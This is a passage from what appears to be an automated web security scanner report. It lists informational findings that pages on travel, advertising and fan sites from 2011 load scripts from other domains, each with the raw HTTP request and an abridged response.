var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
20.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
20.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /activityi;src=2588797;type=nausc826;cat=nauss008;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 03 Oct 2011 00:10:36 GMT
Expires: Mon, 03 Oct 2011 00:10:36 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 752
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><IFRAME width="1" he
...[SNIP]...
</IFRAME><script type="text/javascript"
src="http://a.cdn.intentmedia.net/javascripts/intent_media_expedia_beacon.js">
</script>
...[SNIP]...
20.15. https://go.americanexpress-travel.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://go.americanexpress-travel.com
Path:   /hotel/HotelCobrand.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hotel/HotelCobrand.do;jsessionid=959CC77E68C7D0C1E45369CF857BC3F1.p0716?Service=AMEX&leavingDate=10/04/11&returningDate=10/07/11&searchMode=city&city=Boston,%20United%20States&cityCountryCode=&hotelName=&adults=1&?Service=AMEX&WA1=03010&WA2=%EF%BF%BDid&WA4=%EF%BF%BDid&cmpid=af-ctn-af000063&widgetid=ratefind-hot HTTP/1.1
Host: go.americanexpress-travel.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=amex&grp=21&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B206380952%3B28845483%3Bq%3Fhttp%3A%2F%2Fgo.americanexpress-travel.com%2Fhotel%2FHotelCobrand.do%3FService%3DAMEX%26leavingDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26returningDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyy%22%7D%26searchMode%3Dcity%26city%3D%24%7Bcity%7D%2C%2520%24%7Bcountryn%7D%26cityCountryCode%3D%26hotelName%3D%26adults%3D%24%7Badults%7D%26%3FService%3DAMEX%26WA1%3D03010%26WA2%3D%25eaid%26WA4%3D%25ecid%26cmpid%3Daf-ctn-af000063%26widgetid%3Dratefind-hot&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=141&pos=2&aii=2943600b-8719-4374-99f1-66c3d37bf8d3&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tyrg1st=5CE502CBA48A0513; JSID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; TUID=987675b9-11f8-46ee-8be4-90a9f5cad5fa; JSESSIONID=959CC77E68C7D0C1E45369CF857BC3F1.p0716; Service=AMEX

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=F117AC921CCE045ED73E1F0312D428B7.p0716; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7238

<!-- PAGE: TimeKeeper -->
<link rel="icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>
<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
</div>
<script type="text/javascript" src="https://axptravel.americanexpress.com/ctnwt/theme/shared/js/icrossing/ctniclive.js"></script>
...[SNIP]...
20.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-8213526369189339&output=html&h=280&slotname=9968660253&w=336&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.trip.com%2Fhotels.html&dt=1317602228730&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317602228802&frm=7&adk=3345861870&ga_vid=2049523975.1317602099&ga_sid=1317602099&ga_hid=270757924&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=669&ady=257&biw=1058&bih=906&ifk=3906417519&prodhost=googleads.g.doubleclick.net&fu=4&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 00:37:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 13423
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
20.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 1264
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=1155309149&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BjBjYkxWJTt3uAYqE2gXXz8mJCPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_0nT7x-GHaafkiuKILnL9QPfI4YQQ&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
20.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: cafe
Cache-Control: private
Content-Length: 1263
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
< - DO NOT MODIFY -->
<SCRIPT SRC="http://ad.dedicatedmedia.com/ttj?id=562058&cb=592559840&pubclick=http://adclick.g.doubleclick.net/aclk?sa=l&ai=ByqSqiRWJTs3sEc2oqwGP1s3TDPWyn_oBtZyU8CPNl96RbgAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0wNjY2NjUzODg1ODczNTc0oAGZgO_qA7IBEGFkcy5wdWJtYXRpYy5jb226AQozMDB4MjUwX2FzyAEJ2gFKaHR0cDovL2Fkcy5wdWJtYXRpYy5jb20vaG9zdGVkZGVmYXVsdHRhZ3MvMjY2MjAvMjY2MjEvMjE1NTYvNTU5L2FkdGFnLmh0bWyYAvoBwAIEyALvpLwLqAMB9QMAAABE&num=1&sig=AOD64_21y1nu5mWiQMOEeNytMeOPMZRuvg&client=ca-pub-0666653885873574&adurl=" TYPE="text/javascript"></SCRIPT>
...[SNIP]...
20.19. http://hublotnation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hublot.com/site/loader.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; path=/
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 28115
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...
</script>
<script type='text/javascript' src='http://code.jquery.com/jquery-1.5.min.js?ver=1.5'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=3.2.1'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1&#038;ver=1.0'></script>
...[SNIP]...
20.20. http://hublotnation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...
20.21. http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/ HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf; base_domain_50c378d8154db3a16aee8f1a8bb76f49=hublotnation.com; fbsetting_50c378d8154db3a16aee8f1a8bb76f49=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:05:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Link: <http://hublotnation.com/?p=988>; rel=shortlink
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Type: text/html; charset=UTF-8
Content-Length: 38416

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...
</script>
<script type='text/javascript' src='http://code.jquery.com/jquery-1.5.min.js?ver=1.5'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=3.2.1'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1&#038;ver=1.0'></script>
...[SNIP]...
20.22. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
